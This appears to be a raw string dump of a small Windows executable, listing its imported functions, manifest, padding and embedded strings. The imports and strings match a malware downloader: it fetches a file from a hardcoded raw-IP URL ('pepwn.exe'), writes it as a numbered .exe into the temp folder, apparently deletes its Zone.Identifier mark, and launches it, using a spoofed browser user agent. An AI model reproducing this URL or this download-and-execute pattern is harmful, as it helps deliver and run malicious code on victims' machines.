!This program cannot be run in DOS mode.
TRichj
`.rdata
@.data
@.reloc
4whw478hw4g7whghw74h
w4gw4gw4hw4
wg44w4wh4w4h4
w4gw4hgw4g4gwgrgrgg
PathFileExistsW
SHLWAPI.dll
memset
MSVCRT.dll
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
InternetCloseHandle
InternetReadFile
InternetOpenUrlW
InternetOpenW
WININET.dll
URLDownloadToFileW
urlmon.dll
CreateProcessW
DeleteFileW
CloseHandle
WriteFile
CreateFileW
ExpandEnvironmentStringsW
GetTickCount
CopyFileA
CopyFileW
DeleteFileA
GetModuleHandleA
GetStartupInfoA
KERNEL32.dll
wsprintfW
USER32.dll
ShellExecuteW
SHELL32.dll
RSDS-j
C b
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
Y0i0|0
11%1Q1
2*2:2E2p2}2
3"3-3]3x3~3
474>4E4L4R4Z4`4g4n4y4
525B5b5h5n5
%temp%
%ls\%d.exe
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
%ls:Zone.Identifier
%ls\%d.exe
%ls:Zone.Identifier
%appdata%
%ls\evvevev.txt
3fwfwff3fw3f
4wgw4g4wgw4gw4h
4wgw4gw4h
4gwg4gw4gw4wh4whw4h
http://185.215.113.93/pepwn.exe